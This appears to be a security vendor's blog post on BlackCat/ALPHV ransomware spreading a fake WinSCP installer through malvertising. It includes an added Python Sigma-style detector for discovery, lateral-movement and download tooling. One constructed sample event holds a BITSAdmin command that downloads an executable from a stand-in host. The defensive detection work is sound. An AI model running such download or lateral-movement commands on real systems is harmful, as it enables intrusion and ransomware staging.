BlackCat aka ALPHV Attack Detection: Hackers Abuse Malvertising to Spread Malware and Leverage SpyBoy Terminator to Hinder Security Protection
Cybersecurity researchers have uncovered traces of new malicious activity attributed to the nefarious BlackCat aka ALPHV ransomware gang. The adversary campaign involves the distribution of malware via cloned webpages of legitimate companies, including the webpage of a popular WinSCP file-transferring service. BlackCat is also observed using SpyBoy Terminator for its offensive purposes to hinder anti-malware protection.
Detecting BlackCat’s Activity Spreading Malware via Cloned Webpages
With BlackCat ransomware operators continuously adding new nefarious features to the toolset and seeking effective attack methods, cyber defenders require a reliable source of detection algorithms and threat intel to proactively withstand possible intrusions. To detect the malicious activity associated with the latest BlackCat (ALPHV) campaign, download a set of dedicated Sigma rules available in the SOC Prime Platform.
All detection algorithms are compatible with 28 SIEM, EDR, and XDR technologies and aligned with the MITRE ATT&CK framework v12 to streamline threat hunting procedures.
Hit the Explore Detections button to explore a batch of curated Sigma rules aimed at BlackCat ransomware attack detection. All the rules come with rich metadata, including ATT&CK and CTI references. To help security practitioners search for content, SOC Prime supports filtering by the tags “BlackCat,” “ALPHV,” and “SpyBoy,” based on the names of the malware samples used in the course of the campaign in the spotlight.
BlackCat Uses Malvertising as an Entry Vector: New Attack Analysis
The notorious ALPHV (BlackCat) ransomware affiliates have garnered significant attention in the cyber threat realm since mid-November 2021, targeting a variety of industry sectors across the globe and experimenting with multiple TTPs and offensive tools.
Trend Micro researchers have issued a report highlighting the recent activity of the BlackCat gang. In the latest campaign, malware distributors leverage a malvertising technique to spread malicious strains via cloned web pages of the open-source Windows application WinSCP. This technique involves placing malicious ads intended to lure targeted users into downloading certain types of malware.
BlackCat hackers were observed stealing credentials to gain unauthorized access to the targeted networks and reach the backup server. They also leveraged remote access management utilities to establish and maintain persistence on the compromised system and applied the SpyBoy Terminator to bypass EDR and antivirus protection.
The infection chain starts with a search for the keyword “WinSCP Download” on the Bing search engine: a malicious ad is displayed to the targeted user and leads to the fraudulent website. By following the link, the user is redirected to a cloned webpage of the legitimate WinSCP service. Clicking to download an ISO file masquerading as a legitimate application installer spreads the infection further via two malicious files, setup.exe and a delay-loaded DLL file.
BlackCat also applied a set of other adversary tools to discover the compromised environment, including AdFind, which can be used for collecting information from Active Directory (AD) environments, privilege escalation, and credential theft. The gang also leveraged PowerShell commands to collect user data and store it in a CSV file. Among other tools, they took advantage of a set of command-line utilities, like AccessChk64 and findstr, and PowerShell scripts. To gain admin credentials and escalate privileges, BlackCat applied malicious Python scripts, while such tools as PsExec, BitsAdmin, and curl were used to download other tools and move laterally across the compromised environment.
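The infection chain and the post-compromise tooling described above (an installer executed from a mounted ISO, AdFind and AccessChk64 for discovery, PsExec, BitsAdmin and curl for download and lateral movement, PowerShell exporting user data to CSV) map naturally onto Sigma-style process-creation detections. The block below is an added example, not SOC Prime's published Sigma rules or code from the Trend Micro report: it implements a minimal Sigma-like matcher (supporting the `endswith`, `contains`, `startswith` and `re` modifiers plus a `selection and not filter` condition) and runs four heuristic rules over constructed Sysmon Event ID 1 style events. Field names (`Image`, `CommandLine`, `ParentImage`), the rule logic, and every sample event are assumptions constructed for illustration; the ISO heuristic (an executable at the root of a non-system drive launched from Explorer) is a simplification of what a production rule would need.

```python
"""Added example: Sigma-style matching of BlackCat-like tooling in process events.

Not SOC Prime's or Trend Micro's code. Events and rule logic are constructed
assumptions shaped like Sysmon Event ID 1 (process creation) records.
"""
import re

# Constructed sample events (not real telemetry). Paths, command lines and the
# download URL (example.invalid) are made up for the demonstration.
EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe"},
    # setup.exe launched from the root of a mounted ISO volume (drive E:)
    {"Image": r"E:\setup.exe", "CommandLine": r"E:\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\alice\Downloads\AdFind.exe",
     "CommandLine": "AdFind.exe -f objectcategory=computer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high "
                    "http://example.invalid/tool.exe C:\\Users\\Public\\tool.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ADUser -Filter * | Export-Csv users.csv",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Heuristic rules written in a Sigma-like dict form (hypothetical, not SOC Prime's).
RULES = [
    {"title": "Installer executed from root of mounted ISO volume",
     "detection": {"selection": {"Image|re": r"^[D-Z]:\\[^\\]+\.exe$",
                                 "ParentImage|endswith": r"\explorer.exe"},
                   "condition": "selection"}},
    {"title": "AD discovery or lateral movement tooling",
     "detection": {"selection": {"Image|endswith": [r"\adfind.exe", r"\accesschk64.exe",
                                                    r"\psexec.exe"]},
                   "condition": "selection"}},
    {"title": "Download via BITSAdmin or curl",
     "detection": {"selection": {"Image|endswith": [r"\bitsadmin.exe", r"\curl.exe"],
                                 "CommandLine|contains": ["http://", "https://"]},
                   "condition": "selection"}},
    {"title": "PowerShell exporting user data to CSV",
     "detection": {"selection": {"Image|endswith": r"\powershell.exe",
                                 "CommandLine|contains": "export-csv"},
                   "condition": "selection"}},
]


def _field_matches(value, modifier, expected):
    """Sigma semantics: a list of expected values is an OR; matching is case-insensitive."""
    candidates = [expected] if isinstance(expected, str) else expected
    lowered = value.lower()
    for exp in candidates:
        if modifier == "endswith" and lowered.endswith(exp.lower()):
            return True
        if modifier == "startswith" and lowered.startswith(exp.lower()):
            return True
        if modifier == "contains" and exp.lower() in lowered:
            return True
        if modifier == "re" and re.search(exp, value, re.IGNORECASE):
            return True
        if modifier is None and lowered == exp.lower():
            return True
    return False


def selection_matches(selection, event):
    """All fields inside one selection must match (AND)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        if not _field_matches(event[field], modifier or None, expected):
            return False
    return True


def rule_matches(rule, event):
    """Supports the conditions 'selection' and 'selection and not filter'."""
    detection = rule["detection"]
    hit = selection_matches(detection["selection"], event)
    if detection["condition"] == "selection and not filter":
        return hit and not selection_matches(detection["filter"], event)
    return hit


def run_rules(rules, events):
    """Return (rule title, image path) for every rule/event pair that matches."""
    return [(rule["title"], ev["Image"]) for ev in events for rule in rules
            if rule_matches(rule, ev)]


if __name__ == "__main__":
    for title, image in run_rules(RULES, EVENTS):
        print(f"ALERT: {title} <- {image}")
```

Run as a script it prints one alert per matching event; the explorer.exe and notepad.exe baseline events produce nothing. In a real deployment the same selections would be expressed as proper Sigma YAML and translated to the target SIEM, with the ISO heuristic tightened (for example by correlating with a preceding image-mount event) and the tool-name list extended with hash or original-filename checks so renamed binaries are still caught.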
Leveraging a well-known malvertising trick, BlackCat ransomware operators successfully spread the infection through a sketchy website masquerading as a WinSCP installer download. Rely on SOC Prime Platform to be fully equipped with relevant detection content against any TTP used in ongoing cyber-attacks. Reach the latest ready-to-deploy behavioral detection algorithms and explore relevant context on any cyber attack or threat, including zero-days, CTI and ATT&CK references, and Red Team tooling. Validate the detection stack backed by an automatic read-only ATT&CK data audit, identify blind spots, and address them in a timely manner to ensure complete threat visibility based on the organization-specific logs. Simplify ad-hoc tasks with Sigma and ATT&CK autocompletion, automate cross-platform query translation, and explore relevant cyber threat context from ChatGPT and the global cyber defender community to shave seconds off your SOC operations.